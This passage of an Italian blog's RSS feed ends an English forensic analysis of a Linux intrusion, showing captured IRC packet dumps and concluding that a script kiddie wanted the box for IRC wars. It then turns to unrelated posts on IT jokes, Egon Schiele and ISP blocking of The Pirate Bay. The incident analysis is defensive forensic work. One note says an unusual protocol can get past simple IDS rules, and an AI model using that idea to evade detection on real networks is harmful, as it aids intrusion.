0&#215;0000   4500 0073 bddb 4000 3306 49d4 cefc c0c3        E..s..@.3.I&#8230;..<br />
0&#215;0010   c0a8 641c 15b3 8025 c7a5 b8fa fdbf cf97        ..d&#8230;.%&#8230;&#8230;..<br />
0&#215;0020   5018 2000 7100 0000 3a7c 416e 4472 3334        P&#8230;q&#8230;:|AnDr34<br />
0&#215;0030   7a7c 217e 4f6d 4272 3440 7668 6f73 742e        z|!~OmBr4@vhost.<br />
0&#215;0040   6972 6336 2e73 6572 7665 722e 7462 2e6e        irc6.server.tb.n<br />
0&#215;0050   676e 6574 2e69 7420 5052 4956 4d53 4720        gnet.it.PRIVMSG.<br />
0&#215;0060   2362 6f62 7a20 3a31 3720 7475 2076 657a        #bobz.:17.tu.vez<br />
0&#215;0070   3f0d 0a                                        ?..</p>
<p>18:41:28.584475 irc-1.stealth.net.5555 > 192.168.100.28.32805: P<br />
47289:47335(46) ack 6979 win 8192 (DF)<br />
0&#215;0000   4500 0056 d30e 4000 3306 34be cefc c0c3        E..V..@.3.4&#8230;..<br />
0&#215;0010   c0a8 641c 15b3 8025 c7a5 b945 fdbf cf97        ..d&#8230;.%&#8230;E&#8230;.<br />
0&#215;0020   5018 2000 5425 0000 3a62 6f62 7a60 217e        P&#8230;T%..:bobz`!~<br />
0&#215;0030   6168 6161 4069 7263 362e 7668 6f73 742e        ahaa@irc6.vhost.<br />
0&#215;0040   6c61 2050 5249 564d 5347 2023 626f 627a        la.PRIVMSG.#bobz<br />
0&#215;0050   203a 3135 0d0a                                 .:15..</p>
<p>&#8212;[ Conclusion</p>
<p>Standing by attack topology and modus operandi of the attacker we can<br />
suppose that the attacker is just a script-kiddie that wasn&#8217;t searching<br />
for any reserved information but he needed only a system to make <acronym title="Internet Relay Chat">IRC</acronym><br />
WAR. The attack was brutal and after it the system was full of anomalous<br />
things: the log was cleaned using the command &#8220;rm&#8221; by a script, was<br />
installed a non supported protocol by default (IPv6), the shell binded<br />
on a port not used on that system and so on.<br />
All that anomalies allow us to have notice of an intruder in the system<br />
that could be eventually pursued by law<br />
We was able to analyze all the sessions because are in clear text, the<br />
only one not analyzed is the ssh one.<br />
Teorically we can decode also that protocol because there<br />
are either the public and private keys in the rootkit.</p>
<p>&#8212;[ Notes</p>
<p>With a dumb IDS implementations the presence of unusual protocol should<br />
be a bypassing method of the IDS because if the protocol is unknown to<br />
IDS it doesn&#8217;t match any of the criteria implemented so no rules in the<br />
IDS can give us a response and no alarm is reported.</p>
<p>To decode the log in pcap format we used a series of tool for packet<br />
analysis: tcpdump, ethereal and tcpflow; standard shell tools for log<br />
parsing: strings, awk, ecc; and the whois to obtain informations on<br />
adress information</p>
<p>&#8212;[ The authors </p>
<p>Luca Memini<br />
Francesco Perna</mss></nop></p><img src="http://www.cuore.org/?ak_action=api_record_view&id=1245&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.cuore.org/incident-analysis/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Informatici (ir)responsabili!</title>
		<link>http://www.cuore.org/informatici-irresponsabili/</link>
		<comments>http://www.cuore.org/informatici-irresponsabili/#comments</comments>
		<pubDate>Fri, 26 Feb 2010 17:01:06 +0000</pubDate>
		<dc:creator>luca</dc:creator>
				<category><![CDATA[nerd]]></category>
		<category><![CDATA[ignoranti]]></category>
		<category><![CDATA[informatica]]></category>

		<guid isPermaLink="false">http://www.cuore.org/?p=1243</guid>
		<description><![CDATA[amico: &#8220;Che I.P. diamo al nuovo firewall per fare dei test?&#8221;
responsabile IT: &#8220;Ma mettigli il 300&#8243;]]></description>
			<content:encoded><![CDATA[<p><strong>amico</strong>: <em>&#8220;Che I.P. diamo al nuovo firewall per fare dei test?&#8221;</em><br />
<strong>responsabile IT</strong>: <em>&#8220;Ma mettigli il 300&#8243;</em></p><img src="http://www.cuore.org/?ak_action=api_record_view&id=1243&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.cuore.org/informatici-irresponsabili/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Espressionismo estremo&#8230;</title>
		<link>http://www.cuore.org/espressionismo-estremo/</link>
		<comments>http://www.cuore.org/espressionismo-estremo/#comments</comments>
		<pubDate>Wed, 24 Feb 2010 08:58:45 +0000</pubDate>
		<dc:creator>luca</dc:creator>
				<category><![CDATA[me?!]]></category>
		<category><![CDATA[disegno]]></category>
		<category><![CDATA[Egon Schiele]]></category>
		<category><![CDATA[mostra]]></category>
		<category><![CDATA[pittura]]></category>
		<category><![CDATA[psicoanalisi]]></category>
		<category><![CDATA[sensazioni]]></category>

		<guid isPermaLink="false">http://www.cuore.org/?p=1234</guid>
		<description><![CDATA[La pittura di Egon Schiele mi ha sempre affascinato la profondità soggetti che traspare e l&#8217;immensa malinconia della vita, la forza dei suoi tratti nitidi, rapidi e senza ripensamenti. I suoi ritratti non puntano al bello estetico, non si perdono in dettagli decorativi ma esprimono tutta l&#8217;inquietudine interiore delle persone, ma più delle volte dell&#8217;autore [...]]]></description>
			<content:encoded><![CDATA[<p>La pittura di <a href="http://it.wikipedia.org/wiki/Egon_Schiele" target="_blank">Egon Schiele</a> mi ha sempre affascinato la profondità soggetti che traspare e l&#8217;immensa malinconia della vita, la forza dei suoi tratti nitidi, rapidi e senza ripensamenti. I suoi ritratti non puntano al bello estetico, non si perdono in dettagli decorativi ma esprimono tutta l&#8217;inquietudine interiore delle persone, ma più delle volte dell&#8217;autore stesso, la dimensione psicoanalitica che proprio grazie  <a href="http://it.wikipedia.org/wiki/Sigmund_Freud" target="_blank">Sigmund Freud</a> nasceva in quegli anni.</p>
<p>Artista indiscusso e anticonformista (abbandonò la l&#8217;accademia delle belle arti di Vienna) al quale bisogna riconoscere che davanti ai suoi lavori non si può rimanere assolutamente indifferenti&#8230;</p>
<p>A Milano, presso Palazzo Reale (si quello accanto al Duomo) è possibile ammirare alcuni suoi lavori assieme a quelli dei maggiori autori di quel periodo, sicuramente non potrò mancare di andarci!</p>
<div id="attachment_1233" class="wp-caption aligncenter" style="width: 400px"><img class="size-full wp-image-1233" title="edith_schiele" src="http://www.cuore.org/wp-content/uploads/2010/02/edith_schiele.jpg" alt="" width="390" height="325" /><p class="wp-caption-text">Egon Schiele - Edith Schiele</p></div>
<p>Da wikipedia:</p>
<blockquote><p>L&#8217;attenzione artistica di Egon Schiele è concentrata essenzialmente sulla figura umana, in particolare su quella femminile, che rappresenta con una vasta e varia gamma espressiva:</p>
<ul>
<li> Nudi asciutti e taglienti;</li>
<li>Donne intense, altere, sicure di sè;</li>
<li>Ritratti ed autoritratti di un profondo spessore psicologico;</li>
<li>Coppie avvinte in erotici abbracci senza amore.</li>
</ul>
<p>Una dolce, inquietante ossessione s&#8217;insinua tra corpo e mente scuotendo con energica virulenza tutta la breve vita di Egon Schiele. Una contaminazione artistica, questa, che vuole evidenziare il tratto forte e sensuale di uno degli artisti più rappresentativi dell&#8217;Espressionismo: il suo interesse per il corpo. Schiele viene influenzato dal linguaggio prezioso e raffinato di Gustav Klimt, ma la sua pittura è un viaggio nell&#8217;introspezione psicologica. In rossi sanguinei, bruni tenebrosi, pallidi gialli e lugubri neri egli tenta di dipingere il pathos direttamente in paesaggi malinconici, con alberi avvizziti, così come in disperate immagini di madri e figli addolorati. I suoi sono segni che mettono a nudo l&#8217;inconscio, assumendo una profondità dai contorni emozionali molto più marcati. Sono segni che, caratterizzati da una linea nervosa, quasi nevrastenica, prendono corpo sulla tela in una dissonanza armonica che nega l&#8217;estetica e rompe gli schemi tradizionali. L&#8217;Io dell&#8217;artista emerge, contorce la materia e si ferma nello sguardo allucinato e nelle mani contorte. Mani dove le linee sembrano denunciare il dolore, la sofferenza, la malinconia di un&#8217;anima alla deriva. Schiele descrive i meandri della sua mente, il cupo tormento e il trauma angosciante per la perdita prematura del padre, morto di sifilide. Un evento, questo, che segna in modo indelebile anche il suo rapporto con le donne e con l&#8217;erotismo. Compaiono sulle tele corpi femminili terribilmente provocanti, in pose, spesso assurde, verticali per confondere la spazialità.</p>
<p>L&#8217;artista introduce una tensione erotica esistenziale e psicologica per diffondere un messaggio di critica sociale contro la falsità borghese. Più che una liberazione dal sè, quest&#8217;arte attesta un conflitto all&#8217;interno del soggetto individuale nei confronti delle sue discusse autorità, l&#8217; accademia e lo stato. Su una superficie ruvida e scabra, Schiele mostra senza falsi pudori, un erotismo scevro di moralismi e senza gioia, dove protagoniste sono fanciulle dal volto infantile e dall&#8217;atteggiamento deliberatamente impudico, donne dominate da una sessualità disinibita e urlata nel silenzio della loro anima. Guardandosi intorno, Schiele non può che rimanere affascinato da Van Gogh e con il suo personalissimo carisma cromatico, pesante e deciso, gli rende omaggio con La Stanza in Neulengbach, che si ispira alla Stanza gialla. Reinterpreta anche i Girasoli, in una versione dai colori bruni, spenti dove i petali perdono consistenza e acquistano la decadente tragica forza del vero.</p>
<p>Egon Schiele rivendica l&#8217;importanza della esperienza interiore e delle sue manifestazioni più o meno violente. Scava nei propri personaggi per metterne a nudo la loro anima (spesso Egon Schiele proietta le sue inquietudini nelle figure). Egon Schiele è un abile disegnatore, dal tratto nitido, rapido e secco, senza ripensamenti; non concede spazio al decorativismo o al compiacimento estetico delle sue opere. Le opere di Egon Schiele hanno tutte un impatto forte e violento sull&#8217;osservatore, che assume quasi una posizione di interprete psicoanalitico; esse trasudano di voglia di ribellione e provocazione, cosiccome di angoscia esistenziale. Schiele sonda, nelle figure angosciate prive di riferimento storico e contesto sociale, le &#8220;pulsioni represse&#8221;; egli indaga il voyeurismo e l&#8217; esibizionismo, una coppia freudiana di piaceri perversi. Spesso, nelle sue opere, fissa così intensamente -lo specchio, noi- che la differenza tra il suo sguardo e il nostro minaccia di dissolversi ed egli sembra diventare l&#8217;unico osservatore, il solitario voyeur della propria esibizione. Ma per lo più non sembra tanto provocatoriamente orgoglioso della propria immagine, quanto piuttosto pateticamente esposto nel suo stato rovinoso. Ormai esaurita la sua funzione di ideale classico (il nudo accademico) e di tipo sociale (il ritratto di genere), la figura diventa quasi una cifra di disturbo psicosessuale.</p>
<p>Nella fase finale della sua vita il tratto si fa più nervoso raggiunge la massima libertà espressiva realizzando molti paesaggi soprattutto delle cittadine di Krumau e Neulengbach. Lavori in cui e sempre presente un costante senso drammatico e una visione della realtà sofferta e meditata nell&#8217;interiorità. L&#8217;arte di Schiele ci consente, quindi, di perderci nell&#8217;infinito esistenziale e ritrovarci a tu per tu con il senso della vita, che sfugge a ogni ordine e si ferma nel magma emozionale di una macchia di colore.</p></blockquote>
<div id="attachment_1235" class="wp-caption aligncenter" style="width: 352px"><img class="size-full wp-image-1235" title="schiele-selfportrait" src="http://www.cuore.org/wp-content/uploads/2010/02/schiele-selfportrait.jpg" alt="" width="342" height="500" /><p class="wp-caption-text">Egon Schiele - Autoritratto</p></div><img src="http://www.cuore.org/?ak_action=api_record_view&id=1234&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.cuore.org/espressionismo-estremo/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Freddure</title>
		<link>http://www.cuore.org/freddure/</link>
		<comments>http://www.cuore.org/freddure/#comments</comments>
		<pubDate>Mon, 22 Feb 2010 11:08:56 +0000</pubDate>
		<dc:creator>luca</dc:creator>
				<category><![CDATA[nerd]]></category>
		<category><![CDATA[bofh]]></category>
		<category><![CDATA[informatica]]></category>
		<category><![CDATA[rofl]]></category>

		<guid isPermaLink="false">http://www.cuore.org/?p=1210</guid>
		<description><![CDATA[amico: Non naviga bene il mio pc, mi sa che dovrò reinstallare Internet.
Io: Tutta Internet?!?!?!]]></description>
			<content:encoded><![CDATA[<p><strong>amico</strong>: <em>Non naviga bene il mio pc, mi sa che dovrò reinstallare Internet.</em><br />
<strong>Io</strong>: <em>Tutta Internet?!?!?!</em></p><img src="http://www.cuore.org/?ak_action=api_record_view&id=1210&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.cuore.org/freddure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>fuoco cammina con me</title>
		<link>http://www.cuore.org/fuoco-cammina-con-me/</link>
		<comments>http://www.cuore.org/fuoco-cammina-con-me/#comments</comments>
		<pubDate>Sun, 21 Feb 2010 19:50:11 +0000</pubDate>
		<dc:creator>luca</dc:creator>
				<category><![CDATA[me?!]]></category>
		<category><![CDATA[fuoco]]></category>

		<guid isPermaLink="false">http://www.cuore.org/?p=1228</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div id="attachment_1229" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.cuore.org/wp-content/uploads/2010/02/d60_immagine-025.jpg" rel="lightbox[1228]"><img class="size-medium wp-image-1229" title="fuoco" src="http://www.cuore.org/wp-content/uploads/2010/02/d60_immagine-025-300x201.jpg" alt="" width="300" height="201" /></a><p class="wp-caption-text"> </p></div><img src="http://www.cuore.org/?ak_action=api_record_view&id=1228&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.cuore.org/fuoco-cammina-con-me/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>censura di stato?</title>
		<link>http://www.cuore.org/censura-di-stato/</link>
		<comments>http://www.cuore.org/censura-di-stato/#comments</comments>
		<pubDate>Thu, 18 Feb 2010 13:38:03 +0000</pubDate>
		<dc:creator>luca</dc:creator>
				<category><![CDATA[nerd]]></category>
		<category><![CDATA[censura]]></category>
		<category><![CDATA[routing]]></category>

		<guid isPermaLink="false">http://www.cuore.org/?p=1221</guid>
		<description><![CDATA[
Alla fine siamo giunti alla censura di stato a livello di routing&#8230; (quella a livello di dns era troppo stupida effettivamente)
root@nirvana ~ # traceroute www.thepiratebay.org
traceroute to www.thepiratebay.org (194.71.107.15), 30 hops max, 40 byte packets
1  * * *
2  host157-34-static.42-88-b.business.telecomitalia.it (88.42.34.157)  53.016 ms  56.297 ms  59.948 ms
3  r-mi225-vl19.opb.interbusiness.it (80.20.7.12)  63.885 ms  67.742 ms  71.181 ms
4  crs-mi003-r-mi225.opb.interbusiness.it (151.99.99.53)  [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter size-medium wp-image-1222" title="censura" src="http://www.cuore.org/wp-content/uploads/2010/02/censura-300x261.jpg" alt="" width="300" height="261" /></p>
<p>Alla fine siamo giunti alla censura di stato a livello di routing&#8230; (quella a livello di dns era troppo stupida effettivamente)</p>
<pre>root@nirvana ~ # traceroute www.thepiratebay.org
traceroute to www.thepiratebay.org (194.71.107.15), 30 hops max, 40 byte packets
1  * * *
2  host157-34-static.42-88-b.business.telecomitalia.it (88.42.34.157)  53.016 ms  56.297 ms  59.948 ms
3  r-mi225-vl19.opb.interbusiness.it (80.20.7.12)  63.885 ms  67.742 ms  71.181 ms
4  crs-mi003-r-mi225.opb.interbusiness.it (151.99.99.53)  74.871 ms  78.796 ms  82.104 ms
5  * * *
6  * * *
7  * * *
8  * * *
root@nirvana ~ # traceroute 194.71.107.16
traceroute to 194.71.107.16 (194.71.107.16), 30 hops max, 40 byte packets
1  * * *
2  host29-34-static.42-88-b.business.telecomitalia.it (88.42.34.29)  60.772 ms  64.545 ms  68.029 ms
3  r-mi225-vl19.opb.interbusiness.it (80.20.7.12)  71.995 ms  75.204 ms  78.932 ms
4  crs-mi004-r-mi225.opb.interbusiness.it (151.99.99.61)  82.431 ms  85.586 ms  89.882 ms
5  172.17.6.121 (172.17.6.121)  93.836 ms  97.007 ms  100.976 ms
6  mil50-ibs-resid-7.mil.seabone.net (195.22.192.29)  105.747 ms  47.967 ms  48.596 ms
7  decix-fra52-racc3.fra.seabone.net (195.22.211.205)  70.062 ms  69.409 ms  69.346 ms
8  xe-1-2-0.mpr1.fra4.de.above.net (80.81.194.26)  160.112 ms  160.854 ms  161.201 ms
9  xe-0-0-0.mpr1.fra3.de.above.net (64.125.31.217)  163.505 ms  163.483 ms  163.484 ms
10  xe-4-1-0.mpr1.ams1.nl.above.net (64.125.24.9)  167.147 ms  165.154 ms  165.974 ms
</pre><img src="http://www.cuore.org/?ak_action=api_record_view&id=1221&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.cuore.org/censura-di-stato/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>
